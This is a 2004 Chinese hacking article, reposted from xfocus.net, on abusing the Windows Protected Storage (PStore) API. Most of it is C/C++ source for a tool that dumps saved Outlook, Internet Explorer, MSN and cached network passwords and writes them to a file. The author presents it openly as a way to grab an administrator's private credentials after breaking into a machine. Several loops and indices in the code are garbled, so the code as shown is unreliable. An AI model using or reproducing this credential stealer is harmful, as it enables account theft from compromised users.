申明:本贴来自www.xfocus.net
利用PStore获取帐号信息
创建时间:2004-07-27
文章属性:原创
文章提交:suei8423 (suei8423_at_163.com)
作者:zwell
团队:NB联盟,Shadoweyes
1.简介:什么是PStore?
PStore的全称为:Protected Storage。在系统服务中我们可以看到它(9x没有)。它的作用就是为应用程序的安全保存做一个接口。在它里面记录了一些隐密的信息,比方说:
1. Outlook 密码
2. 删除的Outlook帐号密码
3. IE 密码保存站点密码
4. MSN登陆密码
5. IE 自动保存密码
等等。
2.问题:我们拿来做什么?
我不知道微软是什么样的想法,虽然说这是一个安全的帐号管理服务,但是微软却提供了PStore接口的API函数来对它进行控制。可能他们认为能看的到的都是系统管理,但是如果我们入侵了一台机器,想要获取关于该管理员更多的隐私,这个就是一个很好的方法了。我们可以来获取该用户自动保存在缓存中的密码信息(或者有可能是他不注意一下点到了自动保存^_^...)。总而言之,对一个黑客来讲,这是个好消息。
3.详释:相关函数
要使用PStore,最初我们要用到这个函数PStoreCreateInstance,用于接收接口指针。
函数原型如下:
HRESULT PStoreCreateInstance(
IPStore** ppProvider, //输出,用于接收接口指针
PST_PROVIDERID* pProviderID, //指向Storege提供者的GUID,为0时为默认
void* pReserved, //保留,必须为NULL
DWORD dwFlags //保留,必须为0
);
该函数正确时返回S_OK,注意这个函数因为没有提供SDK,必须手动从Pstorec.dll载入。
在上面函数中的IPStore是一个基于COM的接口,它提供了一引起方法以供调用:
方法 描述
CloseItem Closes a specified data item from protected storage.
CreateType Creates the specified type with the specified name.
CreateSubtype Creates the specified subtype within the specified type.
DeleteItem Deletes the specified item from the protected storage.
DeleteSubtype Deletes the specified item subtype from the protected storage.
DeleteType Deletes the specified type from the protected storage.
EnumItems Returns the interface pointer of a subtype for enumerating items in the protected storage database.
EnumSubtypes Returns an interface for enumerating subtypes of the types currently registered in the protected database.
EnumTypes Returns an interface for enumerating the types currently registered in the protected database.
GetInfo Retrieves information about the storage provider.
GetProvParam Not implemented.
GetSubtypeInfo Retrieves information associated with a subtype.
GetTypeInfo Retrieves information associated with a type.
OpenItem Opens an item for multiple accesses.
ReadAccessRuleSet Not implemented.
ReadItem Reads the specified data item from protected storage.
SetProvParam Sets the specified parameter information.
WriteAccessRuleset Not implemented.
WriteItem Writes a data item to protected storage.
这些方法里面,就我们要用的做一点说明,具体请参照MSDN:
指定枚举区域:
HRESULT EnumTypes(
PST_KEY Key, //PST_KEY_CURRENT_USER(0)表示当前用户,PST_KEY_LOCAL_MACHINE(表示计算机);
DWORD dwFlags, //保留,为0
IEnumPStoreTypes** ppenum
//一个接口,用来枚举类型,以后调用用的到,它有Next,Skip,Reset,Clone等方法。具体用法请看示例
);
用来获取项
HRESULT EnumItems(
PST_KEY Key, //同上
const PSGUID* pItemType, //用IEnumPStoreTypes->raw_Next方法获得。
const GUID* pItemSubtype, //调用IPStorePtr->EnumSubtypes方法获取IEnumPStoreTypesPtr接口,再通过调用IEnumPStoreTypesPtr->raw_Next获得
DWORD dwFlags, //保留,为0
IEnumPStoreItems** ppenum //真正获取项接口,以后就可以开始枚举了。
);
用来读取信息。
HRESULT ReadItem(
PST_KEY Key,
const PSGUID* pItemType,
const GUID* pItemSubtype,
LPCWSTR* szItemName,
DWORD cbData,
BYTE_RPC_FAR* pbData,
PPST_PROMPTIFO pPromptInfo,
DWORD dwFlags
);
4.动刀,开始编写代码:
上面费话很多,现在只看代码:
#include "stdafx.h"
#include
#include "resource.h"
#import "pstorec.dll" no_namespace
char SavingFname[MAX_PATH];
HWND hwndlistview;
BOOL iS9x=FALSE;
typedef struct TOOUTDATA
{
char POPuser[100];
char POPpass[100];
char POPserver[100];
}
OOUTDATA;
OOUTDATA OutlookData[50];
int oIndex=0;
void EnumOutlookAccounts()
{
ZeroMemory(OutlookData,sizeof(OutlookData));
HKEY hkeyresult ,hkeyresult1;
long l,i;
char name[200],skey[200];
DWORD dw2;
FILETIME f;
lstrcpy(skey,"Software\\Microsoft\\Internet Account Manager\\Accounts");
LONG lResult=RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR ) skey,0,KEY_ALL_ACCESS, &hkeyresult1 );
if(ERROR_SUCCESS != lResult)
return ;
i=0;
l=0;
BYTE Data[150];
BYTE Data1[150];
DWORD size;
int j;
j=0;
DWORD type=REG_BINARY;
while(l!=ERROR_NO_MORE_ITEMS)
{
dw2=200;
l=RegEnumKeyEx(hkeyresult1,i,name,&dw2,NULL,NULL,NULL,&f);
lstrcpy(skey,"Software\\Microsoft\\Internet Account Manager\\Accounts");
lstrcat(skey,"\\");
lstrcat(skey,name);
RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR )skey ,0,KEY_ALL_ACCESS, &hkeyresult );
size=sizeof(Data);
if(RegQueryValueEx ( hkeyresult, ( LPCTSTR )"HTTPMail User Name" , 0, &type, Data, &size )==ERROR_SUCCESS)
{
lstrcpy(OutlookData[oIndex].POPuser,(char *)Data);
ZeroMemory(Data,sizeof(Data));
lstrcpy(OutlookData[oIndex].POPserver,"Hotmail");
size=sizeof(Data);
if(RegQueryValueEx ( hkeyresult, ( LPCTSTR )"HTTPMail Password2" , 0, &type, Data1, &size ) ==ERROR_SUCCESS)
{
int totnopass=0;
char mess[100];
for(int i=2;i)||(Data1=='(')||(Data1==')')||(Data1=='.')||(Data1==' ')||(Data1=='-'))
{
OutlookData[oIndex].POPpass[totnopass]=Data1;
totnopass++;
}
OutlookData[oIndex].POPpass[totnopass]=0;
}
ZeroMemory(Data1,sizeof(Data));
oIndex++;
}
else if(RegQueryValueEx ( hkeyresult, ( LPCTSTR )"POP3 User Name" , 0, &type, Data, &size )==ERROR_SUCCESS)
{
lstrcpy(OutlookData[oIndex].POPuser,(char *)Data);
ZeroMemory(Data,sizeof(Data));
size=sizeof(Data);
RegQueryValueEx ( hkeyresult, ( LPCTSTR )"POP3 Server" , 0, &type, Data, &size ) ;
lstrcpy(OutlookData[oIndex].POPserver,(char *)Data);
ZeroMemory(Data,sizeof(Data));
size=sizeof(Data);
if(RegQueryValueEx ( hkeyresult, ( LPCTSTR )"POP3 Password2" , 0, &type, Data1, &size ) ==ERROR_SUCCESS)
{
int totnopass=0;
char mess[100];
for(int i=2;i)||(Data1=='(')||(Data1==')')||(Data1=='.')||(Data1==' ')||(Data1=='-'))
{
OutlookData[oIndex].POPpass[totnopass]=Data1;
totnopass++;
}
OutlookData[oIndex].POPpass[totnopass]=0;
}
ZeroMemory(Data1,sizeof(Data1));
oIndex++;
}
j++;
i++;
}
}
void SaveToDisk(char *buf)
{
DWORD dwBytes;
HANDLE hf = CreateFile (SavingFname, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
SetFilePointer(hf,0 ,NULL,FILE_END);
WriteFile (hf, (LPVOID)buf,strlen(buf), &dwBytes, NULL);
CloseHandle(hf);
}
BOOL AddItemm(BOOL Save,char *resname,char *restype,char *usrname,char *pass)
{
if(!Save)
{
LVITEM lvi;
lvi.mask = LVIF_TEXT;
lvi.state = LVIS_SELECTED ;
lvi.stateMask = 0;
lvi.iItem = 10000;
lvi.iSubItem = 0;
lvi.pszText = "";
int i = ListView_InsertItem(hwndlistview, &lvi);
if(!iS9x)
{
ListView_SetItemText(hwndlistview, i, 0, resname);
ListView_SetItemText(hwndlistview, i, 1, restype);
ListView_SetItemText(hwndlistview, i, 2, usrname);
ListView_SetItemText(hwndlistview, i, 3, pass);
}
else
{
ListView_SetItemText(hwndlistview, i, 0, usrname);
ListView_SetItemText(hwndlistview, i, 1, pass);
}
SetFocus(hwndlistview);
ListView_SetItemState (hwndlistview,i,LVIS_FOCUSED | LVIS_SELECTED, 0x000F);
ListView_SetSelectionMark(hwndlistview,i);
}
else
{
if(!iS9x)
{
SaveToDisk("\r\n");
SaveToDisk("");
SaveToDisk(resname);
SaveToDisk(" | ");
SaveToDisk(restype);
SaveToDisk(" | ");
SaveToDisk(usrname);
SaveToDisk(" | ");
SaveToDisk(pass);
SaveToDisk(" | ");
SaveToDisk("\r\n");
}
else
{
SaveToDisk("\r\n");
SaveToDisk("");
SaveToDisk(usrname);
SaveToDisk(" | ");
SaveToDisk(pass);
SaveToDisk(" | ");
SaveToDisk("\r\n");
}
}
return TRUE;
}
void EnumPStorage(BOOL Save)
{
typedef HRESULT (WINAPI *tPStoreCreateInstance)(IPStore **, DWORD, DWORD, DWORD);
HMODULE hpsDLL;
hpsDLL = LoadLibrary("pstorec.dll");
tPStoreCreateInstance pPStoreCreateInstance;
pPStoreCreateInstance = (tPStoreCreateInstance)GetProcAddress(hpsDLL, "PStoreCreateInstance");
IPStorePtr PStore;
HRESULT hRes = pPStoreCreateInstance(&PStore, 0, 0, 0);
IEnumPStoreTypesPtr EnumPStoreTypes;
hRes = PStore->EnumTypes(0, 0, &EnumPStoreTypes);
if (!FAILED(hRes))
{
GUID TypeGUID;
char szItemName[512];
char szItemData[512];
char szResName[1512];
char szResData[512];
char szItemGUID[50];
while(EnumPStoreTypes->raw_Next(1,&TypeGUID,0) == S_OK)
{
wsprintf(szItemGUID,"%x",TypeGUID);
IEnumPStoreTypesPtr EnumSubTypes;
hRes = PStore->EnumSubtypes(0, &TypeGUID, 0, &EnumSubTypes);
GUID subTypeGUID;
while(EnumSubTypes->raw_Next(1,&subTypeGUID,0) == S_OK)
{
IEnumPStoreItemsPtr spEnumItems;
HRESULT hRes = PStore->EnumItems(0, &TypeGUID, &subTypeGUID, 0, &spEnumItems);
LPWSTR itemName;
while(spEnumItems->raw_Next(1,&itemName,0) == S_OK)
{
wsprintf(szItemName,"%ws",itemName);
char chekingdata[200];
unsigned long psDataLen = 0;
unsigned char *psData = NULL;
_PST_PROMPTINFO *pstiinfo = NULL;
hRes = PStore->ReadItem(0,&TypeGUID,&subTypeGUID,itemName,&psDataLen,&psData,pstiinfo,0);
if(lstrlen((char *)psData)<(psDataLen-1))
{
int i=0;
for(int m=0;m=',';
else
szItemData=psData[m];
i++;
}
szItemData[i-1]=0;
}
else
{
wsprintf(szItemData,"%s",psData);
}
lstrcpy(szResName,"");
lstrcpy(szResData,"");
//220d5cc1 Outlooks
if(lstrcmp(szItemGUID,"220d5cc1")==0)
{
BOOL bDeletedOEAccount=TRUE;
for(int i=0;i.POPpass,szItemName)==0)
{
bDeletedOEAccount=FALSE;
AddItemm(Save,OutlookData.POPserver,"OutlookExpress",OutlookData.POPuser,szItemData);
break;
}
}
if(bDeletedOEAccount)
AddItemm(Save,szItemName,"Deleted OE Account",OutlookData.POPuser,szItemData);
}
//5e7e8100 - IE:Password-Protected sites
if(lstrcmp(szItemGUID,"5e7e8100")==0)
{
lstrcpy(chekingdata,"");
if(strstr(szItemData,":")!=0)
{
lstrcpy(chekingdata,strstr(szItemData,":")+1);
*(strstr(szItemData,":"))=0;
}
AddItemm(Save,szItemName,"IE:Password-Protected sites",szItemData,chekingdata);
}
// b9819c52 MSN Explorer Signup
if(lstrcmp(szItemGUID,"b9819c52")==0)
{
char msnid[100];
char msnpass[100];
int i=0;
BOOL first=TRUE;
for(int m=0;m=',';
i++;
}
else
{
if(IsCharAlphaNumeric(psData[m])||(psData[m]=='@')||(psData[m]=='.')||(psData[m]=='_'))
{
szItemData=psData[m];
i++;
}
}
}
szItemData[i-1]=0;
char *p;
p=szItemData+2;
//psData[4] - number of msn accounts
for(int ii=0;iicbResource+1;
if(nCount>1023)
nCount=1023;
lstrcpyn(buff, pce->abResource, nCount);
buff[nCount] = 0;
CharToOem(buff, buff2);
if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen)
return FALSE;
lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
dat->nBufPos+=lstrlen(buff2)+1;
nCount=pce->cbPassword+1;
if(nCount>1023)
nCount=1023;
lstrcpyn(buff, pce->abResource+pce->cbResource, nCount);
buff[nCount] = 0;
CharToOem(buff, buff2);
if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen)
return FALSE;
lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
dat->nBufPos+=lstrlen(buff2)+1;
return TRUE;
}
void CashedPass(BOOL Save)
{
HMODULE hLib=LoadLibrary("MPR.DLL");
PASSCACHECALLBACK_DATA dat;
dat.pBuffer=(char *)malloc(65536);
dat.nBufLen=65536;
dat.nBufPos=0;
pWNetEnumCachedPasswords = (ENUMPASSWORD)GetProcAddress(hLib, "WNetEnumCachedPasswords");
pWNetEnumCachedPasswords(NULL, 0, 0xff, AddPass, (DWORD) &dat);
char *svStr;
svStr=dat.pBuffer;
do
{
char *svRsc=svStr;
svStr+=lstrlen(svStr)+1;
char *svPwd=svStr;
svStr+=lstrlen(svStr)+1;
char szUser[1024];
char szPass[1024];
AddItemm(Save,"","",svRsc,svPwd);
}
while(*svStr!='\0');
FreeLibrary(hLib);
};
/////////////////////////////////////////
#define TableHeader " "
#include
LRESULT CALLBACK DLgProc(HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam)
{
OPENFILENAME ofn;
char szFile[MAX_PATH];
switch (message)
{
case WM_INITDIALOG:
SendMessage(hDlg, WM_SETICON, ICON_SMALL, (LPARAM)LoadIcon(GetModuleHandle(0), MAKEINTRESOURCE(IDI_ICON1)));
if(!iS9x)
SetWindowText(hDlg,"Protected Storage www.hirosh.NET");
else
SetWindowText(hDlg,"Cashed Passwords www.hirosh.NET");
hwndlistview = GetDlgItem(hDlg, IDC_LIST3);
LVCOLUMN lvcol;
if(!iS9x)
{
lvcol.mask =LVCF_TEXT;
;
lvcol.pszText = "Resource Name";
ListView_InsertColumn(hwndlistview, 0, &lvcol);
ListView_SetColumnWidth(hwndlistview, 0, 160);
lvcol.mask =LVCF_TEXT;
lvcol.pszText = "Resource Type";
ListView_InsertColumn(hwndlistview, 1, &lvcol);
ListView_SetColumnWidth(hwndlistview, 1, 110);
lvcol.mask =LVCF_TEXT;
lvcol.pszText = "User Name/Value";
ListView_InsertColumn(hwndlistview, 2, &lvcol);
ListView_SetColumnWidth(hwndlistview, 2, 200);
lvcol.mask =LVCF_TEXT;
lvcol.pszText = "Password";
ListView_InsertColumn(hwndlistview, 3, &lvcol);
ListView_SetColumnWidth(hwndlistview, 3, 100);
EnumOutlookAccounts();
EnumPStorage(FALSE);
}
else
{
lvcol.mask =LVCF_TEXT;
lvcol.pszText = "User Name/Value";
ListView_InsertColumn(hwndlistview, 0, &lvcol);
ListView_SetColumnWidth(hwndlistview, 0, 250);
lvcol.mask =LVCF_TEXT;
lvcol.pszText = "Password";
ListView_InsertColumn(hwndlistview, 1, &lvcol);
ListView_SetColumnWidth(hwndlistview, 1, 150);
CashedPass(FALSE);
}
ListView_SetExtendedListViewStyle(hwndlistview,LVS_EX_FULLROWSELECT);
return TRUE;
case WM_COMMAND:
switch ( LOWORD(wParam) )
{
case IDOK:
ZeroMemory(&ofn, sizeof(OPENFILENAME));
ofn.lStructSize = sizeof(OPENFILENAME);
ofn.hwndOwner = hDlg;
lstrcpy(szFile,"*.*");
ofn.lpstrFile ="pstectedstorage.htm";
ofn.nMaxFile = sizeof(szFile);
ofn.lpstrFilter = "Htm\0*.htm\0";
ofn.nFilterIndex = 1;
ofn.lpstrFileTitle = NULL;
ofn.nMaxFileTitle = 0;
ofn.lpstrInitialDir = NULL;
ofn.Flags = OFN_PATHMUSTEXIST | OFN_FILEMUSTEXIST;
if (GetSaveFileName(&ofn)==TRUE)
{
lstrcpy(SavingFname,ofn.lpstrFile);
if(strstr(SavingFname,".htm")==0)
lstrcat(SavingFname,".htm");
SaveToDisk(TableHeader);
if(!iS9x)
{
SaveToDisk("Resource Name | Resource Type | User Name/Value | Password | ");
EnumOutlookAccounts();
EnumPStorage(TRUE);
}
else
{
SaveToDisk("User Name/Value | Password | ");
CashedPass(TRUE);
}
SaveToDisk(Table);
}
break;
case IDCANCEL:
EndDialog(hDlg, LOWORD(wParam));
ExitProcess(0);
break;
break;
}
}
return FALSE;
}
//
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
if((int)GetVersion() < 0)
iS9x=TRUE;
else
iS9x=FALSE;
if(lpCmdLine[0]==NULL)
{
InitCommonControls();
DialogBox(hInstance, (LPCTSTR)IDD_DIALGMAIN, 0, (DLGPROC)DLgProc);
}
else
{
lstrcpy(SavingFname,lpCmdLine);
SaveToDisk(TableHeader);
if(!iS9x)
{
SaveToDisk("Resource Name | Resource Type | User Name/Value | Password | ");
EnumOutlookAccounts();
EnumPStorage(TRUE);
}
else
{
SaveToDisk("User Name/Value | Password | ");
CashedPass(TRUE);
}
SaveToDisk(Table);
}
return 0;
}
//End of code###########################################################
5.后记,
文章写的很乱,代码也没怎么说明,如果有看不懂的地方还请原谅。您若有什么问题
的话可以跟我联系(或是要工程文件的话) ZwelL QQ:27592430 zwell@sohu.com
6.参考文献:
1.MSDN http://msdn.microsoft.com/library/default.asp?url=/library/en-us/devnotes/winprog/pstore.asp
2.Protected Storage http://www.codeproject.com/tools/HirPStorage.asp |